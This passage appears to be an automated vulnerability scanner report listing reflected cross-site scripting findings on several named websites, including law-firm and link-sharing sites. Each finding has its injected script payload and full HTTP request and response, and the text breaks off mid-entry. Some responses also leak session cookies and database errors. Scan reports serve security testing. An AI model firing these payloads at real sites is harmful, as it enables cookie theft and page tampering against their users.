<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; cha
...[SNIP]...
<a href="/BibtexHandler7912f"><script>alert(1)</script>ffb7212d2e4?lang=de">
...[SNIP]...
4.84. http://www.blurpalicious.com/submit/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blurpalicious.com
Path:   /submit/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbc96"style%3d"x%3aexpression(alert(1))"9670aa4b70 was submitted in the REST URL parameter 1. This input was echoed as bbc96"style="x:expression(alert(1))"9670aa4b70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /submitbbc96"style%3d"x%3aexpression(alert(1))"9670aa4b70/ HTTP/1.1
Host: www.blurpalicious.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:21:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=d4f1d7c3f1f6f498ed8932dfa3207b2f; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20463


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
<meta name="keywords" content="submitbbc96"style="x:expression(alert(1))"9670aa4b70 online, submitbbc96"style="x:expression(alert(1))"9670aa4b70 review, submitbbc96"style="x:expression(alert(1))"9670aa4b70 free, submitbbc96"style="x:expression(alert(1))"9670aa4b70 information, submit
...[SNIP]...
4.85. http://www.brownrudnick.com/bio/srchrslt_alpha.asp [LName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brownrudnick.com
Path:   /bio/srchrslt_alpha.asp

Issue detail

The value of the LName request parameter is copied into the HTML document as plain text between tags. The payload 2273c<script>alert(1)</script>da3fa89dfa4 was submitted in the LName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bio/srchrslt_alpha.asp?LName=A2273c<script>alert(1)</script>da3fa89dfa4 HTTP/1.1
Host: www.brownrudnick.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSSSASTRS=FHKLAMJAAMPCLADDLOGDPJOG;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 15:07:33 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Connection: close
Content-Length: 11529
Content-Type: text/html
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Professional Directory</t
...[SNIP]...
<b> &quot;A2273c<script>alert(1)</script>da3fa89dfa4&quot;</b>
...[SNIP]...
4.86. http://www.brownrudnick.com/disc/cntcdisclaimer.asp [ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brownrudnick.com
Path:   /disc/cntcdisclaimer.asp

Issue detail

The value of the ID request parameter is copied into the HTML document as plain text between tags. The payload cf64e<script>alert(1)</script>e02f267a586 was submitted in the ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /disc/cntcdisclaimer.asp?ID=461cf64e<script>alert(1)</script>e02f267a586 HTTP/1.1
Host: www.brownrudnick.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSSSASTRS=FHKLAMJAAMPCLADDLOGDPJOG;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 15:09:56 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Connection: close
Content-Length: 12696
Content-Type: text/html
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Notice</title>
<link rel
...[SNIP]...
</i> [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(ID = 461cf64e<script>alert(1)</script>e02f267a586)'.<br>
...[SNIP]...
4.87. http://www.brownrudnick.com/nr/articlesIndv.asp [ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brownrudnick.com
Path:   /nr/articlesIndv.asp

Issue detail

The value of the ID request parameter is copied into the HTML document as plain text between tags. The payload f0bd0<script>alert(1)</script>ba5591b9a23 was submitted in the ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nr/articlesIndv.asp?ID=554f0bd0<script>alert(1)</script>ba5591b9a23 HTTP/1.1
Host: www.brownrudnick.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSSSASTRS=FHKLAMJAAMPCLADDLOGDPJOG;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 14:47:37 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Connection: close
Content-Length: 11223
Content-Type: text/html
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Articles</title>
<link r
...[SNIP]...
</i> [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(ID = 554f0bd0<script>alert(1)</script>ba5591b9a23)'.<br>
...[SNIP]...
4.88. http://www.colivia.de/submit.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.colivia.de
Path:   /submit.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f132"%20style%3dx%3aexpression(alert(1))%207970fd9dcc1 was submitted in the REST URL parameter 1. This input was echoed as 8f132\" style=x:expression(alert(1)) 7970fd9dcc1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /submit.php8f132"%20style%3dx%3aexpression(alert(1))%207970fd9dcc1 HTTP/1.1
Host: www.colivia.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:22:12 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=d4fbc49fd988d8deff16e4092aa20bc6; path=/
Connection: close
Content-Type: text/html
Content-Length: 13901


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
<a href="/upcoming.php?category=submit.php8f132\" style=x:expression(alert(1)) 7970fd9dcc1">
...[SNIP]...
4.89. http://www.deweyleboeuf.com/en/Firm/MediaCenter/PressReleases.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.deweyleboeuf.com
Path:   /en/Firm/MediaCenter/PressReleases.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14c61"><script>alert(1)</script>6973c4e8044 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/Firm/MediaCenter/PressReleases.aspx?14c61"><script>alert(1)</script>6973c4e8044=1 HTTP/1.1
Host: www.deweyleboeuf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=86622477.1302961759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=86622477.1300520895.1302961759.1302961759.1302961759.1; __utmc=86622477; __utmb=86622477.1.10.1302961759; ASP.NET_SessionId=rcsrgderh04wwm5500gzommn;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Apr 2011 15:42:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: website#lang=en; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 89927


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="conten
...[SNIP]...
<a href="?14c61"><script>alert(1)</script>6973c4e8044=1&pg=1">
...[SNIP]...
4.90. http://www.deweyleboeuf.com/en/Ideas/ClientAlerts.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.deweyleboeuf.com
Path:   /en/Ideas/ClientAlerts.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e2cd"><script>alert(1)</script>6a3943ac963 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/Ideas/ClientAlerts.aspx?2e2cd"><script>alert(1)</script>6a3943ac963=1 HTTP/1.1
Host: www.deweyleboeuf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=86622477.1302961759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=86622477.1300520895.1302961759.1302961759.1302961759.1; __utmc=86622477; __utmb=86622477.1.10.1302961759; ASP.NET_SessionId=rcsrgderh04wwm5500gzommn;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Apr 2011 15:43:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: website#lang=en; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 78019


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="conten
...[SNIP]...
<a href="?2e2cd"><script>alert(1)</script>6a3943ac963=1&pg=1">
...[SNIP]...
4.91. http://www.deweyleboeuf.com/en/Ideas/Events.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.deweyleboeuf.com
Path:   /en/Ideas/Events.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e4bd"><script>alert(1)</script>7eca4c40787 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/Ideas/Events.aspx?9e4bd"><script>alert(1)</script>7eca4c40787=1 HTTP/1.1
Host: www.deweyleboeuf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=86622477.1302961759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=86622477.1300520895.1302961759.1302961759.1302961759.1; __utmc=86622477; __utmb=86622477.1.10.1302961759; ASP.NET_SessionId=rcsrgderh04wwm5500gzommn;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Apr 2011 15:43:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: website#lang=en; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 92994


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="conten
...[SNIP]...
<a href="?9e4bd"><script>alert(1)</script>7eca4c40787=1&pg=1">
...[SNIP]...
4.92. http://www.deweyleboeuf.com/en/Ideas/Events/EventArchive.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.deweyleboeuf.com
Path:   /en/Ideas/Events/EventArchive.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d0c5"><script>alert(1)</script>4b948308b21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/Ideas/Events/EventArchive.aspx?5d0c5"><script>alert(1)</script>4b948308b21=1 HTTP/1.1
Host: www.deweyleboeuf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=86622477.1302961759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=86622477.1300520895.1302961759.1302961759.1302961759.1; __utmc=86622477; __utmb=86622477.1.10.1302961759; ASP.NET_SessionId=rcsrgderh04wwm5500gzommn;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Apr 2011 15:44:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: website#lang=en; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 92673


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="conten
...[SNIP]...
<a href="?5d0c5"><script>alert(1)</script>4b948308b21=1&pg=1">
...[SNIP]...
4.93. http://www.deweyleboeuf.com/en/Ideas/InTheNews.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.deweyleboeuf.com
Path:   /en/Ideas/InTheNews.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5044b"><script>alert(1)</script>1fae55877d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/Ideas/InTheNews.aspx?5044b"><script>alert(1)</script>1fae55877d0=1 HTTP/1.1
Host: www.deweyleboeuf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=86622477.1302961759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=86622477.1300520895.1302961759.1302961759.1302961759.1; __utmc=86622477; __utmb=86622477.1.10.1302961759; ASP.NET_SessionId=rcsrgderh04wwm5500gzommn;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Apr 2011 15:43:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: website#lang=en; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 77557


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="conten
...[SNIP]...
<a href="?5044b"><script>alert(1)</script>1fae55877d0=1&pg=1">
...[SNIP]...
4.94. http://www.deweyleboeuf.com/en/Ideas/Publications/AttorneyArticles.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.deweyleboeuf.com
Path:   /en/Ideas/Publications/AttorneyArticles.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7176a"><script>alert(1)</script>129891fa40c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/Ideas/Publications/AttorneyArticles.aspx?7176a"><script>alert(1)</script>129891fa40c=1 HTTP/1.1
Host: www.deweyleboeuf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=86622477.1302961759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=86622477.1300520895.1302961759.1302961759.1302961759.1; __utmc=86622477; __utmb=86622477.1.10.1302961759; ASP.NET_SessionId=rcsrgderh04wwm5500gzommn;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Apr 2011 15:43:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: website#lang=en; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 77733


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="conten
...[SNIP]...
<a href="?7176a"><script>alert(1)</script>129891fa40c=1&pg=1">
...[SNIP]...
4.95. http://www.diggita.it/submit.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.diggita.it
Path:   /submit.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fce1b"><script>alert(1)</script>c501a948188 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /submit.phpfce1b"><script>alert(1)</script>c501a948188 HTTP/1.1
Host: www.diggita.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:21:34 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=67c03560314d0d10e9be0bd654435e86; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25421


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it" xmlns:fb
...[SNIP]...
<fb:login-button v="2" onlogin="window.location.href='/modules/fb/login.php?return=/submit.phpfce1b"><script>alert(1)</script>c501a948188'">
...[SNIP]...
4.96. http://www.diggita.it/submit.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.diggita.it
Path:   /submit.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ffb6"><script>alert(1)</script>5c2ce711f18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /submit.php?5ffb6"><script>alert(1)</script>5c2ce711f18=1 HTTP/1.1
Host: www.diggita.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:21:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=ccd9b1d9e9471da4ea8841848718301e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 26642


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it" xmlns:fb
...[SNIP]...
<fb:login-button v="2" onlogin="window.location.href='/modules/fb/login.php?return=/login.php?return=/submit.php?5ffb6"><script>alert(1)</script>5c2ce711f18=1'">
...[SNIP]...
4.97. http://www.embarkons.com/sharer.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 12956<img%20src%3da%20onerror%3dalert(1)>9574d4dbe79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12956<img src=a onerror=alert(1)>9574d4dbe79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/12956<img%20src%3da%20onerror%3dalert(1)>9574d4dbe79 HTTP/1.1
Host: www.embarkons.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:14:50 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=oe5lalcmiqfs2uf70pbbndtm97; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:14:50 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">12956<img src=a onerror=alert(1)>9574d4dbe79</div>
...[SNIP]...
4.98. http://www.embarkons.com/sharer.php/a [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/a

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 87967<img%20src%3da%20onerror%3dalert(1)>88c35fcade8 was submitted in the REST URL parameter 2. This input was echoed as 87967<img src=a onerror=alert(1)>88c35fcade8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/a87967<img%20src%3da%20onerror%3dalert(1)>88c35fcade8 HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:50 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:51 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">a87967<img src=a onerror=alert(1)>88c35fcade8</div>
...[SNIP]...
4.99. http://www.embarkons.com/sharer.php/images/close-icon.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/close-icon.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4bc6e<img%20src%3da%20onerror%3dalert(1)>2f3138d923a was submitted in the REST URL parameter 3. This input was echoed as 4bc6e<img src=a onerror=alert(1)>2f3138d923a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/images/close-icon.gif4bc6e<img%20src%3da%20onerror%3dalert(1)>2f3138d923a HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:53 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">close-icon.gif4bc6e<img src=a onerror=alert(1)>2f3138d923a</div>
...[SNIP]...
4.100. http://www.embarkons.com/sharer.php/images/postit-bulb.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
